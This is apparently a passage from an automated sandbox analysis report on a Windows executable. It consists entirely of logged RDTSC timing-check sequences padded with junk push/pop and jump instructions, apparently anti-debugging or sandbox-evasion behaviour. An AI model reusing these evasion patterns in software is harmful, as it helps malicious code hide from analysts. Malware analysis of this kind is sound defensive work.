                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B803 second address: 141B809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B809 second address: 141B819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F2A68BE4F46h 0x0000000c popad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B9ED second address: 141B9F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B9F5 second address: 141B9F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B9F9 second address: 141BA1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A68BD69DEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F2A68BD69DBh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141BA1B second address: 141BA27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2A68BE4F46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141BA27 second address: 141BA30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141BBE1 second address: 141BBE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141F05F second address: 141F06E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A68BD69DBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1423407 second address: 1423427 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F2A68BE4F58h 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1423427 second address: 1423430 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1423430 second address: 1423436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1423436 second address: 1423446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jng 00007F2A68BD69D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14230F7 second address: 1423125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jmp 00007F2A68BE4F57h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007F2A68BE4F4Ah 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1423125 second address: 1423129 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1423129 second address: 142312F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142312F second address: 142314C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F2A68BD69E3h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142314C second address: 1423156 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2A68BE4F62h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142427B second address: 142429B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2A68BD69F2h 0x00000008 jmp 00007F2A68BD69E6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142943C second address: 1429446 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14295A6 second address: 14295ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A68BD69E0h 0x00000009 popad 0x0000000a jnl 00007F2A68BD69DEh 0x00000010 push ebx 0x00000011 jmp 00007F2A68BD69DCh 0x00000016 pop ebx 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F2A68BD69E3h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14295ED second address: 14295F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F2A68BE4F46h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14295F9 second address: 1429607 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F2A68BD69D6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1429607 second address: 142960B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142960B second address: 1429611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14298AA second address: 14298B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F2A68BE4F46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142B23B second address: 142B245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F2A68BD69D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142B245 second address: 142B24E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142CA0B second address: 142CA11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142CA11 second address: 142CA15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142CA15 second address: 142CA3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F2A68BD69D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jns 00007F2A68BD69D6h 0x00000013 jmp 00007F2A68BD69E1h 0x00000018 pop edi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1433000 second address: 143302E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F2A68BE4F4Eh 0x0000000c jmp 00007F2A68BE4F4Fh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F2A68BE4F4Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143302E second address: 1433038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1433038 second address: 143303C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143303C second address: 1433040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1433040 second address: 143304C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2A68BE4F46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143304C second address: 143306A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A68BD69E8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143306A second address: 143306E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1431986 second address: 143198A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143198A second address: 1431995 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007F2A68BE4F46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143209F second address: 14320D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F2A68BD69D6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jnc 00007F2A68BD69DEh 0x00000013 pushad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F2A68BD69E2h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E0E9C second address: 13E0EF3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2A68BE4F46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F2A68BE4F48h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov edi, dword ptr [ebp+122D35DDh] 0x0000002c push 00000004h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F2A68BE4F48h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 and ecx, 23F095C8h 0x0000004e nop 0x0000004f push ecx 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1432387 second address: 14323A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BD69E9h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14323A6 second address: 14323AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14363E5 second address: 14363F3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2A68BD69D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14363F3 second address: 14363FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F2A68BE4F46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14363FD second address: 143640D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2A68BD69D6h 0x00000008 jg 00007F2A68BD69D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143640D second address: 1436412 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1436412 second address: 1436433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F2A68BD69D6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c jg 00007F2A68BD69D6h 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1436433 second address: 143643C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143643C second address: 1436442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1436442 second address: 1436447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1436447 second address: 143644C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14366C6 second address: 14366CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A9D8 second address: 143A9DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A9DE second address: 143A9E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A9E2 second address: 143AA33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BD69E8h 0x00000007 jmp 00007F2A68BD69E8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F2A68BD69E4h 0x00000013 pushad 0x00000014 jnp 00007F2A68BD69D6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143AA33 second address: 143AA5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2A68BE4F57h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 jl 00007F2A68BE4F46h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A176 second address: 143A183 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2A68BD69D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A183 second address: 143A1A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F2A68BE4F50h 0x0000000b jo 00007F2A68BE4F46h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A1A1 second address: 143A1A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A275 second address: 143A27B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A27B second address: 143A281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A281 second address: 143A2B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jno 00007F2A68BE4F46h 0x0000000c jmp 00007F2A68BE4F56h 0x00000011 jmp 00007F2A68BE4F4Ch 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A2B6 second address: 143A2BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A406 second address: 143A427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnl 00007F2A68BE4F46h 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F2A68BE4F4Dh 0x00000013 push eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A427 second address: 143A42C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1442850 second address: 1442858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1442858 second address: 144285C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144285C second address: 1442860 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1441D0F second address: 1441D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1441D17 second address: 1441D36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A68BE4F59h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1442270 second address: 1442276 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1442276 second address: 144227A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144227A second address: 144228B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jg 00007F2A68BD69DCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144228B second address: 1442299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnc 00007F2A68BE4F46h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1442299 second address: 144229D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144657A second address: 144657E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144657E second address: 14465B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BD69DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d jmp 00007F2A68BD69E2h 0x00000012 popad 0x00000013 jng 00007F2A68BD6A19h 0x00000019 jc 00007F2A68BD69F4h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14465B5 second address: 14465EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A68BE4F58h 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F2A68BE4F53h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14456B1 second address: 14456C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F2A68BD69D8h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14456C1 second address: 14456C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14456C7 second address: 14456CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445AFC second address: 1445B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445B00 second address: 1445B0C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2A68BD69D6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445B0C second address: 1445B16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F2A68BE4F46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445E2E second address: 1445E4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F2A68BD69E6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445E4A second address: 1445E63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A68BE4F55h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445E63 second address: 1445E67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446112 second address: 144612B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2A68BE4F4Fh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144612B second address: 1446131 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14462AF second address: 14462C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A68BE4F51h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14462C4 second address: 14462C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144AE17 second address: 144AE69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BE4F4Fh 0x00000007 je 00007F2A68BE4F46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F2A68BE4F57h 0x00000014 pushad 0x00000015 jmp 00007F2A68BE4F53h 0x0000001a jnl 00007F2A68BE4F46h 0x00000020 pushad 0x00000021 popad 0x00000022 push edx 0x00000023 pop edx 0x00000024 popad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13994C9 second address: 1399518 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BD69DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jc 00007F2A68BD69D6h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F2A68BD69E8h 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c pop eax 0x0000001d je 00007F2A68BD69D6h 0x00000023 push edi 0x00000024 pop edi 0x00000025 popad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F2A68BD69DBh 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1399518 second address: 1399525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2A68BE4F46h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d rdtsc
